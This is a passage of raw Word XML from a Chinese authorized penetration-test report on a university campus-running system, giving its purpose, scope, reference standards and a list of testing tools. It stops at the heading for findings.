          <w:tcPr>
            <w:tcW w:w="8276" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00DE2D93">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>参与本次测试小组成员有：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AAB3332">
            <w:pPr>
              <w:pStyle w:val="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="788E8D5F">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2C4787">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkEnd w:id="29"/>
    <w:p w14:paraId="41EB5EF6">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc265848429"/>
      <w:bookmarkStart w:id="42" w:name="_Toc251332383"/>
      <w:bookmarkStart w:id="43" w:name="_Toc15461949"/>
      <w:bookmarkStart w:id="44" w:name="_Toc18031"/>
      <w:bookmarkStart w:id="45" w:name="_Toc15464562"/>
      <w:bookmarkStart w:id="46" w:name="_Toc394569379"/>
      <w:bookmarkStart w:id="47" w:name="_Toc11859777"/>
      <w:bookmarkStart w:id="48" w:name="_Toc280310875"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="67D54F2F">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc280310876"/>
      <w:bookmarkStart w:id="50" w:name="_Toc251332384"/>
      <w:bookmarkStart w:id="51" w:name="_Toc265848430"/>
      <w:bookmarkStart w:id="52" w:name="_Toc15464563"/>
      <w:bookmarkStart w:id="53" w:name="_Toc15461950"/>
      <w:bookmarkStart w:id="54" w:name="_Toc11859778"/>
      <w:bookmarkStart w:id="55" w:name="_Toc18775"/>
      <w:bookmarkStart w:id="56" w:name="_Toc394569380"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="5930D84A">
      <w:pPr>
        <w:pStyle w:val="99"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc280310877"/>
      <w:bookmarkStart w:id="58" w:name="_Toc265848431"/>
      <w:bookmarkStart w:id="59" w:name="_Toc247541248"/>
      <w:bookmarkStart w:id="60" w:name="_Toc251332385"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过本项目的成功实施，在坚持科学、客观、公正原则的基础上，全面、完整地了解统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>校跑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统当前的安全状况，分析系统所面临的各种风险，模拟攻击者可能利用的漏洞，根据测试结果发现系统存在的安全问题，并对严重的问题提出加固的建议。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkEnd w:id="60"/>
    <w:p w14:paraId="3E4C78E5">
      <w:pPr>
        <w:pStyle w:val="99"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次测试预期达到的目标为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA5AE42">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现授权渗透测试目标系统的安全漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6324D3D7">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc83378041"/>
      <w:bookmarkStart w:id="62" w:name="_Toc153853142"/>
      <w:bookmarkStart w:id="63" w:name="_Toc238634142"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对发现的漏洞提供加固方案及防护建议</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
    <w:p w14:paraId="313B3D35">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc11859779"/>
      <w:bookmarkStart w:id="65" w:name="_Toc15464564"/>
      <w:bookmarkStart w:id="66" w:name="_Toc265848432"/>
      <w:bookmarkStart w:id="67" w:name="_Toc27213"/>
      <w:bookmarkStart w:id="68" w:name="_Toc394569381"/>
      <w:bookmarkStart w:id="69" w:name="_Toc15461951"/>
      <w:bookmarkStart w:id="70" w:name="_Toc280310878"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试范围</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="273A5E80">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次渗透测试的范围如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>
        <w:tblW w:w="8276"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207"/>
        <w:gridCol w:w="3193"/>
        <w:gridCol w:w="3876"/>
      </w:tblGrid>
      <w:tr w14:paraId="66058F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80" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1207" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="8EAADB" w:themeFill="accent5" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02E299A6">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>序 号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3193" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="8EAADB" w:themeFill="accent5" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="668D9600">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>名 称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3876" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="8EAADB" w:themeFill="accent5" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="01F81389">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>备 注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="73BC701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80" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1207" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="double" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29E0C7FC">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3193" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CB012A0">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>校跑</w:t>
            </w:r>
            <w:r>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3876" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="double" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="722AB039">
            <w:pPr>
              <w:pStyle w:val="75"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>card.lnut.edu.cn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7366BEFD">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc15464565"/>
      <w:bookmarkStart w:id="72" w:name="_Toc11859780"/>
      <w:bookmarkStart w:id="73" w:name="_Toc16334"/>
      <w:bookmarkStart w:id="74" w:name="_Toc15461952"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试依据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="5EAC2CD1">
      <w:pPr>
        <w:pStyle w:val="99"/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全测试服务将参考下列规范进行工作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A3D57F">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息安全技术 信息安全风险评估规范（GB/T 20984-200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">） </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C54EA">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息技术 信息安全管理实用规则（GB/T 19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16-2005)(ISO/IEC 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">99:2000) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38881494">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息技术 安全技术 信息安全管理实用规则（GB/T 22081-2016 ） </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586DE9DC">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GB T 31509-2015 信息安全技术 信息安全风险评估实施指南 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4072B98B">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息系统审计标准（ISACA） </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B33EC1B">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP OWASP_Testing_Guide_v3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B6A6AB">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP OWASP_Development_Guide_2005 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF88554">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP OWASP_Top_10_2010_Chinese_V1.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BF5D6D">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GB∕T 302</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">9-2020 信息安全技术 网络安全漏洞分类分级指南 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F977A">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GB∕T 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">931-2019 信息安全技术 Web应用安全检测系统安全技术要求和测试评价方法  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5392E">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc11859781"/>
      <w:bookmarkStart w:id="76" w:name="_Toc15461953"/>
      <w:bookmarkStart w:id="77" w:name="_Toc15464566"/>
      <w:bookmarkStart w:id="78" w:name="_Toc13776"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="01C782C1">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拓扑分析工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">：DNS Sweep、Nslookup 等 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B00ACC">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动化扫描工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">：Nessus、AIScanner 等 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F9558">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描、服务检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">：Nmap、SuperScan 等 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761518D">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嗅探分析工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">：Ethereal、Entercap、Dsniff 等 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003148C">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exploiting 利用工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">：Metasploit Framework 等 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCFE102">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用缺陷分析工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">：Gatling自动化渗透测试系统、SQLMAP 等 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432568DD">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态分析工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">：MobSF等 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A69DE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="96"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="96"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CDEE9C">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc11859782"/>
      <w:bookmarkStart w:id="80" w:name="_Toc15461954"/>
      <w:bookmarkStart w:id="81" w:name="_Toc20783"/>
      <w:bookmarkStart w:id="82" w:name="_Toc15464567"/>
      <w:bookmarkStart w:id="83" w:name="_Toc453860009"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题归纳</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="73D42A34">
      <w:pPr>
        <w:pStyle w:val="106"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc7487"/>
      <w:bookmarkStart w:id="85" w:name="_Toc9233"/>
      <w:bookmarkStart w:id="86" w:name="_Toc15464568"/>
      <w:bookmarkStart w:id="87" w:name="_Toc11859783"/>
      <w:bookmarkStart w:id="88" w:name="_Toc15461955"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Web安全</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="5292BEF8">
      <w:pPr>
        <w:pStyle w:val="107"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc9437"/>
      <w:bookmarkStart w:id="90" w:name="_Toc20668"/>
      <w:bookmarkStart w:id="91" w:name="_Toc15461956"/>
      <w:bookmarkStart w:id="92" w:name="_Toc11859784"/>
      <w:bookmarkStart w:id="93" w:name="_Toc470196715"/>
